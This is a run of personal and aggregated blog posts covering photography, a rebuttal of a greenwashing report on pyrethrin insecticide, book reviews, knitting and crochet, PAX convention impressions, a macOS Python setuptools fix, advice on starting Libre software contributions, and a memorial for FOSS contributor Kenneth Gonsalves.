Guitar on my lap (played more dobro-style) so I could better manage the lighting and reach the camera shutter without risk of the instrument slipping. I pointed a small warm light at my fingers to get some shine and enough light to brighten the strings so you'd be able to see the motion. Then put the camera on a tripod and set the aperture to 1.4 for soft bokeh around the edges and to amplify any motion of the strings. I think I used the timer for this shot, although I experimented with the remote and with operating the camera directly. I chose a 1/10 exposure so that you'd see the motion blur on the things I was intentionally moving and hopefully not the guitar body (or camera when I was hitting the shutter directly). I tried first with just the strings moving, but it wasn't sufficiently obvious what was going on unless you knew what to look for, and I wanted a picture that was more clear and hopefully satisfying to non-musicians!

All the fiddling happened before the photo was taken, so this is straight out of camera (well, converted to jpg, but close enough)

Another photo idea that didn't make it:
I thought it would have been nice to set up the photo so that you could see the still fingers holding a chord on the neck of the guitar and the moving fingers doing fingerpicking. Unfortunately, I wasn't sure I could manage the lighting and camera without a helper on that one, so I decided to go with the simpler shot. Perhaps another day!

comments

So, I was catching up on the news from home when I saw this article on the 10 worst household products for greenwashing. As it happens, I know something about #1 here, because the landlords arranged to have a similar product used around our house and we were curious. Here's what marketplace says:

1. Raid EarthBlends Multi-bug Killer

With an insecticide derived from the chrysanthemum flower, Raid EarthBlends Multi-bug Killer touts itself as an alternative insect control solution. Despite its naturally derived component, the label warns users to avoid contact with skin and clothes, and not to inhale the mist when spraying it.

"A lot of things in nature are actually dangerous and toxic," said Vasil. "Not all natural things are good for you. And this is a perfect example."

The product states it can be used for bed bugs, despite that in many parts of Canada, homeowners are banned from using such pesticides on their lawns. "Banned from your backyard, but OK for your bed?" questioned Vasil.

In a statement, the maker, SC Johnson, said it is "committed to using sustainable ingredients in our products" and the products are "safe and effective when used as directed."

"Banned from your backyard, but OK for your bed?" DOOOOOOOOM.

If the CBC marketplace folk had done their research, they could have *easily* found out that the active ingredient here is, as promised, not known to be dangerous to mammals. It is an insecticide, so obviously it's bad for insects. But why can't it be used outside? It's also very bad for aquatic life, so the concern is that if used outside, it will get washed away in rain and end up in our waterways. This would be a Bad Thing. And that's why you're not allowed to use it in your backyard.

But unless you're Aquaman, or plan to bring your goldfish to bed, it is indeed pretty safe to use on bedding.

One website I found noted that after being fed high doses of pyrethrums for 2 years, rats were mostly fine with some minor liver damage (as one might expect for many intentional overdoses of anything). When forced to inhale the stuff for 30 minutes a day, there was some very minor lung irritation. Basically, don't try to kill yourself with it and you'll probably be fine. Heck, even if you try to kill yourself with it you'll probably be mostly fine.

This whole "banned from your backyard/ok for bed" doom and gloom implication is utterly misleading and uninformed. And this ignorance is really embarrassing: I found most of my information about Pyrethrums (the class of chemicals involved) using a couple of google searches and then confirmed with my sister who happens to be an expert in the field, but she pointed out that I can get all the same information via Health Canada's website. These should be very easy for the CBC Marketplace research team to find and read.

I don't know anything about the other products being discussed, but I'd take what they say with a pretty healthy dose of skepticism.

comments

Guardians Inc.: The Cypher
by Julian Rosado-Machain




I got this book free as part of a librarything program and wrote up my review there ages ago. But you can get it on amazon for free right now and you can also get it for free on Barnes and Noble, too, so I thought this would be a good excuse to revisit my review:

I *love* the world here, and I'm loathe to say much more about it lest I spoil the discovery for someone else. Adventure, strange magics, unusual creatures, a special library, and a teenaged boy and his grandfather at the centre of it all. The characters don't feel fully fleshed out yet, but I have faith that they'll grow to be as deep as the world and its history and magic apparently are.

My one complaint is that although the author had me believing in animated grotesques and magical libraries, I utterly didn't believe the "romance" and I was so skeptical that I found it distracting and was kind of hoping for some variant of an "it was all a dream" explanation. Surely if you can make robots and centaurs seem reasonable, it can't be that hard to portray a teenager's crush?

That complaint aside, I really enjoyed this and am looking forwards to future stories!

In short, the world is amazing and I recommend the book. There are libraries of awesomeness and magical doorways used to get the best food the world over, which is totally a thing I would do if I had a magical doorway of that sort. I even recommend it for your children as long as they're old enough to be critical about the romance. I don't know how long it'll stay free, maybe a week? So go now and take advantage of the promo!

comments

And, to offset the griping in my private posts today, here's a pretty picture of something I'm working on:



I took this photo for the Active Assignment Weekly flickr group, which gives a weekly photo challenge. I haven't been participating much for a variety of reasons, but this week's challenge was "big and small" and the knitting was right there.

I have to say, though I love the final look of knitted cables, they are the most hand cramping awfulness at that size and my level of experience. The metal needles are new, purchased because I have horribly bent the wooden ones in that size that I was using. Glad I started on the wood, or I'd have given up in despair over dropped stitches on slippery needles, but I'm also glad I switched because it's so much easier now that I've got the hang of it. And I'm glad I didn't give up, 'cause gloves are a nice size to carry around and now that the first one's close to done I'm so darned pleased with myself for managing it! I have clearly leveled up in knitting between this and the chunky lace scarf I've been working on.

Next up: finishing my long-neglected pony for Katie (she has hair now, but I'm rubbish at embroidering cutie marks on crochet...) more crocheted angry birds for people to play with at the Albuquerque mini maker faire, and finishing my set of mane 6 teensy tiny felted crochet ponies. Plus a Top Secret present project that must be done before the end of September.

I am also trying very hard not to get drawn into making an arcade sona dress. I've been playing some more LoL specifically because she was free in the pax swag bag and not only do I like playing support (something I didn't have a char for in LoL) but I also enjoy the cute little video game touches they put on that skin. The DDR attack forces people to dance!



Unfortunately, I'm not interested in spending a day wearing nothing but a bra on top, so it's not likely cosplay for me. But I am obsessed with her skirt right now with the pixels and the rainbows. I have a problem, I know.

Edit: because the Arcade Sona costume idea is in my brain now -- wouldn't it be cool to build her console and have the buttons make the light effects, including the DDR attack? I could totally find a little set of projector lights that would let me do that... Darnit, I'm not talking myself out of this anytime soon, am I?

comments

It was, as always, fun and exhausting. I don't know how people do fan con stuff more than once a year.

I think the most unusual game I played was the board game "Oh my god, there's an axe in my head!" wherein you are at the first league of nations meeting and the entertainment, the Swiss axe throwing team, has gone bezerk and you must trade territories and make treaties while fleeing for your life.

The best panel I went to was the geek crafting one, and not only because it was almost the only panel I went to. Love seeing other people's crafts, and I think VandalEyes kind of stole the show as low-effort high-hilarity art.

For the first time I actually sat down and did some tabletop roleplaying at PAX and it was pretty cool, but we didn't really have time to get deep into the game 'cause we'd made dinner plans already. Still, the system was one I'd never heard of before, based largely on relationships between characters in a post-apocalyptic setting, and it had a lot of potential. Most ridiculous moment: one of the characters was a "faceless" who wore a gas mask at all times. This led to a pretty hilarious moment where one of the other players made a crack about how he couldn't use facebook... because he didn't have a face. Queue groans and game master banging his head lightly on the table. That's how you know you've got a good synergy going in the players. ;)

Our costumes went over well. People figured out the lemmings thing pretty quickly and we got some laughs. I have no idea if people figured out the Leah & Magda Diablo III cosplay, but we certainly got stopped for lots of photos so obviously we looked interesting. I'm contemplating having a photo shoot on my own for the Leah costume before my hair grows back out completely or I get it cut professionally prior to GHC, but my friends do have some pictures of us actually at PAX so I'll put those up when I have them. I am sad that Susan and I can't do a photo shoot together easily.

As usual, I found PAX surprisingly pleasant for such a huge crowded venue. I really appreciate how so many folk ask before taking photos of me when I'm in costume. I mean, I wouldn't be wearing this getup if I weren't willing to pose, but it's still nice that the standard is "can I get a photo?" and not "pose for me!" We had an interesting conversation about how PAX has been for us safer than, say, going to university classes or (in my case) walking to the library. I am incredibly sorry to hear that this enhanced safety wasn't the case for everyone at PAX prime this year. (I fear the responses to that as usual, but so far the condemnation seems pretty sincere.)

Coming home sucked. I mean, the flights were fine, but it's a billion degrees here and it sucks to contrast the relative safety of downtown Seattle during PAX to feeling like I have to dress down if I want to walk to the library here without being hassled. After the excessive heat woke me up in the middle of the night, I started reading twitter and this post about being harassed frequently on public transit really hit home for me. Did you know that I rarely leave the house without earphones in (although sometimes they're not on or only one is in, for safety), just so I have a visible reason to ignore the multitude of men who feel a need to "hey pretty lady" me even if I'm showing all the signs that I'm not in the mood to chat? It's hard, 'cause so many people here are just southwest friendly and chatting with them would be fun, but you never know when you're going to get someone who's got serious problems.

So yeah, I miss PAX and its friendly strangers who want to talk about games and not about how pretty I am (or am not) already, and I haven't even been outside.

PAX Prime is definitely superior to PAX East as far as venue goes. More sound baffling, closer hotels, more food options within easy walking distance, more carpet, better trained staff, etc. I also find the prime exhibitors tend towards "We want to show you our awesome game!" and less "We want to sell you stuff!" even though I got less swag this year in general (That's not really a huge problem as there's only so much cheap con stuff I really need, though I was disappointed to see so few buttons. I like buttons and do actually wear ones I get if I like where they came from.)

I was a bit disappointed that my favourite triple-A RPG devs weren't really there: bioware had a little session room and I enjoyed their talk on voice acting, but no big booth. Blizzard I didn't see at all (especially disappointing given our diablo III costumes -- would have been nice to show off!), and I saw no opportunity to try Guild Wars 2 out on the con floor (I'll probably buy it eventually, but I would have liked a demo). I guess I could have tried the wizards of the coast offerings, but the lines were huge and to be honest after our somewhat mediocre DDO experience I just wasn't that interested. We did try their new minis game which was pretty much everything I don't like about mini and card games stuffed into one over-ruled package, so that didn't help. At least I got to try Torchlight II, which is on my to-buy list when it comes out (even though, I admit, I'm less excited about it now that I have diablo III to fill that niche). Still, it's $20 and multiplayer and I had fun with the demo and chatting briefly with the dev folk who were there working the line. Plus, my engineer had a ferret pet and robots, so she was pretty cool.

I did get to try lots of indie puzzle games, so that was cool 'specially since I was hanging out with M most often and that's her favourite genre. And I have to say, the art assets for even little indie games are getting more and more impressive. I highly enjoyed the dinosaur tower defense game even though it wasn't that novel just 'cause of the ridiculous dinos. :) [Edit: the beta is free on the Chrome web store!] And the Go-like zombie containment game was clever (and seriously, $3. I bought it on the spot.) And I'm looking forwards to using my coupon to buy Splice which had you splicing molecule-like structures to fit the given pattern.

I didn't spend time watching the League of Legends tourney, but I think this code they gave me will give me a new character to learn and that's kind of fun. I don't feel like I'm willing to invest the kind of time I need into LoL to be really good at everything, but when it cools down maybe I can get up to the level where I'm at least not embarrassing my friends if I stick to a small subset of characters, so having a new one is exciting!

I didn't really try many new DS games since I don't have a 3DS yet, but I was reminded why I like the DS so much when all my other devices were running out of power and I could still play pokemon. I guess I'll keep an eye out for good black friday through Christmas sales on the 3ds. It seems weird to invest in the platform given how much easier it is to get cheap games for my tablet, but it seems like there's still enough available to make me happy and at least I can trade some games with my sister. Plus, the DS doesn't overheat me like my other devices, and that's worth a fair bit in this city!


Anyhow... I'm taking today off as self-quarantine after being exposed to so many people, but I *do* need to get some cleaning done (I left the house in quite the state after last minute costume work; normally I try to clean before I leave so I don't come home and think my house sucks. Oops.) so that's enough rambling about PAX until I develop the few pictures I took or get pictures of us in costume from other people!

comments

"How do I start contributing to Libre Software?" is a very common question (I asked that too) one comes across on most FLOSS lists. Today, I posted the following on a private list and was asked for a public link, so here goes:

SWOT

There are so many Libre software projects to choose from, that choosing one can be quite confusing when you are starting out. Do yourself a favor and take a few moments to do a SWOT (Strengths, Weaknesses, Opportunities and Threats) analysis before you decide to jump onto the Libre software bandwagon.

Its better to give yourself time to think (or write down) which technical area or field interests you:  Which language do you want to program in? Is it frontend software or backend stuff? Web programming or something else? Do you like writing system software or application level software? Or, do you like libraries, prefer working with algorithms/statistical applications, etc..

Once you have figured out your field of interest, its easier to shortlist something and get started on finding a project to work on.

FINDING A PROJECT

As I mentioned above, there are so many Libre software projects that its overwhelming at the outset. Having figured out your field, dont randomly visiting a bugtracker and try to solve bugs, which is not a bad idea if you have only a few hours per week. However, if you want to wade a little deeper, try using Google to your advantage - read, Google Summer of Code. This recently concluded program, has a ready list of organisations to choose from and the 2012 list is available at: http://www.google-melange.com/gsoc/program/accepted_orgs/google/gsoc2012 .

Besides these few hundred GSoC Orgs, Gnome runs its own outreach program for women: http://live.gnome.org/GnomeWomen/OutreachProgram2012 and then, there is the European Space Agency, which is (sadly) only open to EU students. However, if you are interested in working outside of the SoC span, projects are always interested in contributors and would welcome your efforts 24x7x365. That said, these SoC tasks require a longer commitment in terms of time, so you need to decide what you want to do.

FOUND A TASK, WHAT NEXT?

After you have searched Melange (or ESA) for keywords of your choice, visit each organisations Ideas page, where you will find a list of tasks ranked as per preference or difficulty level (This entirely depends on the Org). Remember to cross-check with the Melange page if the task has already been completed via GSoC, or not. If a task is still available, find out what is required to get started on it and prepare a short abstract. This will help you to..
- figure out the development stack vis-a-vis your skillset,
- realise how much time and effort is required to bridge the gap, if any ;
- prepare a timeline estimate. (Dont obsess over this as its just an estimate and it will vary if the Org changes any requirements.)

These done, talk to the Org - always, Always, ALWAYS talk to the Org _before_ you start work on anything. Just because a task is listed on the Ideas page does not mean its a part of their workflow (which can always change), nor is the opposite true. The best way to find out is to talk to them, first. Again, remember that these SoC tasks require a longer commitment in terms of time.

COMMUNICATING WITH LIBRE COMMUNITIES

Most Libre projects have their own communication channels. This could be via Mailing lists or Forums, including IRC channels on dedicated servers or on freenode. Its important to work with them via these public channels and that means learning to communicate and not worry about asking silly (psst..there are none) questions. Communicating with the core developer and/or mentors and community of users is crucial - they can be an invaluable source for ideas and helpful hints.

Many projects have separate lists (and IRC channels) for users and developers. Join them and introduce yourself (or lurk around to get a hang of how things work) and when you are ready, do talk about the task you want to work on. A development mailing list, where the core developers would be available, is distinguishable via the "*-devel" mailing address. Same is true for IRC channels - If you like CLI tools, try Irssi or Quassel if you want a GUI client. Pick your poison from this list of IRC clients. 

EXPERIMENT WITH THE DEVELOPMENT STACK

Finally, and most importantly, you must be comfortable working with the software the project uses - that means, you should be able to clone and get the software to install and work on your local machine. Here, communicating with your Org helps - You can ask for help if you have hardware or software issues, clarify installation and dependency issues, etc... No software works flawlessly (else, people would be out of jobs :)) and Libre software is no exception - the only difference being "software development on a libre/public scale".

Another aspect of getting familiar with the development stack is familiarizing yourself with the projects internal system - Since, each project uses its own bug tracker, DVCS, Wiki for documentation, Email/Forum and IRC communication system ; take some time to get familiar with each of these. If you plan to stick around for any length of time, you would be using some, or, all the software stacks they use on a regular basis.

Your transition from newbie to active contributor is a lot faster when you are comfortable with the development stack. Doing your homework will give you the confidence required to grok it enough to start working on the code-base, suggest changes or solve bugs, etc..

I hope these suggestions help you find your niche learning shell to contribute to, and of course, welcome to the Libre software. Have fun!

A random bit of makery 'cause it occurred to me to take a couple of pictures tonight:



No, the xbox controller has nothing to do with it. It's just there for scale, although I do find it amusing that it looks like I might be advertising for some gay gamer/maker thing or somesuch. I hope I didn't get anyone's hopes up!



All it is is a nice way to hold a subset of my crochet hooks. I have a larger case that my friend Marlene made for me, but it's a bit too large to tote around, so if I want to take a small collection of hooks, now I've got an easy and colourful way to do so. yeay!

The pattern for the star hook case is available on ravelry or the direct pattern link on the author's blog. All I did was change colours every two rows to make a rainbow case, which maybe isn't quite as clean and classy, but I think it's fun! It's a pretty interesting pattern, since all it does is make use of a stitch pattern that contains reasonably tight holes to make a ornate mesh that I can push hooks through. So clever!

It's also very soft. I'm tempted to make myself a very rainbow scarf to wear around town. But my PAX costume isn't done yet, so that comes first!

comments

Got some Quality Spam today:

This is a compound that is used to increase nitric oxide release. As a matter of fact, gamers playing bowling games actually have to go as far as to run and go into a bowling stance before the release as a method of providing a more realistic experience. Would you like a way to build a back-end stream of revenue so you can have positive cash flow come the first of every month?

The folk on IRC with me earlier agreed that bowling on nitrous would probably make the game more funny. But will it provide more revenue?

comments

Not sure this will be ever useful to anyone else, but just in case it hits me again later or when I'm helping someone else set up mailman on mac osx 10.7...

When I tried to run python bootstrap.py I got an error that looked like this:

AttributeError: 'module' object has no attribute '__getstate__'

The solution, as implied here is to fix my setuptools which is somehow wrong. On my mac, that meant clearing:

/Library/Python/2.7/site-packages/

Simple, easy, except that I have about a billion copies of python installed so finding the right one took some work. To figure out what to remove, I did the following:

(a) Ran the version of python I was actually trying to use to get a command line shell
(b) loaded setuptools (e.g.: import setuptools)
(c) Checked where it actually was (e.g.: print setuptools.__file__)
(d) Removed stuff from that directory (I could have just removed setuptools, but since I was trying to set up a fresh environment anyhow, I actually emptied the entire directory and let mailman reload)

comments

Am breaking a long hiatus from blogging to report a really sad news :: Kenneth Gonsalves, (lawgon on IRC), a long time Free/Libre software (especially INPycon) contributor is no more. When I first saw this mail in my inbox, I could not believe it was true.

My first interaction with Lawgon was via the LinuxChix mailing lists. Back then, I was surprised to see posts from a "nilgiris" domain name and I assumed he was an USA-NRI actively posting on their lists. Later, the Mumbai-LUG list when I had tried to install his "avsap" accounting software ~ it would not work on my machine and I wrote him a mail with the gory error details. Finally, in 2007, I met "lawgon" on IRC, ##linux-india. I was never an IRC person but when he got banned from the channel, I had a long argument with Devdas (f3ew on IRC) about it - mostly because I felt that the rules were not clear, and even more importantly, felt that rules ought to be implemented uniformly, sans cronyism.

A few moons later, I met him IRL for the first time at the first formation meet for Fosscomm and sat next to him through the whole meeting. In my eyes, he was like a father-figure, a person you can talk to freely, someone who didnt see IT and FLOSS as the road to self-publicity, fame and riches. Rather, he saw Libre software as I did - of, for and by the people. It was nice talking to him and hear the stories via the work he had done at NRC-Foss/AU-KBC.

He was someone I respected because unlike some FOSS people, he actually wrote and released his code publicly: https://bitbucket.org/lawgon, and worked within the community, had no illusions or superiority complex about himself. Most of us in the FLOSS community were his kids age and in my interactions I didnt find him patronizing nor elitist in "demanding" we respect his age. Quite the opposite, he never hesitated to ask for technical help from people younger than him, quite ego less. His fiery rants on his blog (http://lawgon.livejournal.com/) always made me chuckle. There are very few blogs I follow and thusfar, I've read every post of his - strong opinions peppered with character. His own.

In his list communication, he could be quite blunt in his comments, and I've had my moments sparring with him on the lists, but if you take a moment to look behind the scenes, his honesty and sincerity towards Libre software showed. I remember his mail asking me not to leave the Mumbai LUG list and my response on the kind of Libre community (the lack thereof) we foster, which, to my surprise, found an echo with him. I remember his long email rant (about someone which I wont get into in public) where he mentioned "...and I'm scared of you" ~ yeah, I too scrubbed my eyes and smiled at his droll sense of humor, as I typed out an apology.

I remember his IRC comment that he wanted his daughter to meet me and my curiosity piqued ~ this was before I had met him in real life and going by the stereotypical Indian fathers attitude, I very much doubted if they would want their daughters to be like me. Or maybe it was his sense of humor - I'll never know!? Some moons later an email asking for some information on "legal rights of women in India" for her coursework, IRC discussions on virtualenvwrapper (he asked me why I wanted to use it and for a moment I thought he was testing me -- I could not imagine a longtime Python developer (atleast a lot longer than me) asking me that, unless he was pulling my leg or if it was an interview question), discussing a recent Python workshop he held at Kerala, and so many other interactions... {Edit1:: His recent mail on the open source business model has some excellent advice for wannabe entrepreneurs.}

I was hoping to meet him at InPycon this year but now the conference wont be the same without him. I hope and pray his family finds the strength to carry on without him and may his soul rest in peace! You will be missed Lawgon..and try not to kickstart a "GPL Vs. BSD" argument in heaven!

I haven’t gone back to Facebook advertising since I wrote my heartbreak piece about it over a year ago.  I may try them again soon to promote a couple of new, non-phone-app products we have in the works.  In the meantime I came across this remarkable infographic.  It says:

• nothing about how well the ads are working for the advertisers,
• a lot about how increasingly mobile our readers and users are becoming, and
• an enormous amount about how well ads are doing as revenue generators for Facebook.

---

Source: OnlineMBA.com

Cross-posted from my security blog, Web Insecurity.

Should you really change your re-used passwords after a breach? Maybe not.

comments

Insanely Simple: The Obsession That Drives Apple's Success
Ken Segall

When the thesis of your book is that simple is important and the best way to do many things, you really should try saying so in a simple way. I find verbiage to be a flaw of many pop non-fiction books, but it *really* stood out badly here because the wordiness and repetitive padding of some sections was so out of sync with the message.

That said, I enjoyed the book, though I disagreed with lots of it. It weaves a compelling tale out of anecdotes about Steve Jobs and the author's work at Dell and Intel (for examples of complexity, by and large). The stories are well-told, but sometimes the justification for why simplicity works ranged from dubious to outright scientifically wrong from my knowledge. But I liked the flow of ideas, and it kept me thinking, and even where the justifications were wrong it doesn't mean the conclusions necessarily are.

It *did* irk me considerably that I felt like I'd gotten more out of this book than out of Schneier's Liars and Outliers, but I think I liked this book partially because I disagreed with it and it forced me to think critically. Plus, I can't get my Age of Persuasion marketing story fix anymore, so this fit a similar niche for me.

Insanely Simple is worth reading for the stories alone, and it'd be possible to just skim to them and have a good time. But the weave of simplicity-as-solution as a way to tie the stories together is worth a look too, just be careful to leave your critical thinking caps on.

comments

Liars and Outliers: Enabling the Trust that Society Needs to Thrive
Bruce Schneier

I want to tell you that this book is amazing and I loved every moment of it. It's smart, I agree with most of what he says, and I very much appreciate Bruce Schneier's candidness when he's making statements more on gut instinct and doesn't yet have full scientific work to back it up, or the work he has isn't actually very convincing. He could have written a compelling book without those admissions (and many authors of pop non-fiction do exactly that) but I found his insights much more interesting when he acknowledges where they're more speculation than anything else. The anecdotes, stories and analogies are interesting and work with the ideas contained therein, and the applications to social structures and laws and whatnot were clear and convincing.

Without reservations, I can say that the book is great. But I've got to be honest: I didn't love every moment of it. I was bored. It's a brilliant book about... exactly the sort of things I think about every day at work, or argue about with my friends in my spare time. Because I read Schneier's blog, I'd already seen most of the studies that piqued my interest, so there wasn't any rush to go out and use my university library subscriptions to find the original scientific papers. The biological predator-prey ideas were mostly stuff I learned in grade school for goodness sakes. That's perhaps a sign of my parents' enhancement of my education than anything else, but the end result definitely had me skimming quite a lot to keep from boring myself to the point where I put the book down and never pick it up again.

So if you're curious about trust and security but not immersed in it, I can recommend the book heartily. But if you're like me and do this stuff for a living, this is a great book to lend out and skim, but it's maybe not something you're going to need to spend time reading cover-to-cover.

Edit: I just noticed the Schneier's linked to this review, so it may well get read by people who have no idea what I do for a living. At the time of writing this, I am working as a researcher in biologically inspired computer security and complex systems. That may explain why so much of this comes up in my day job.

comments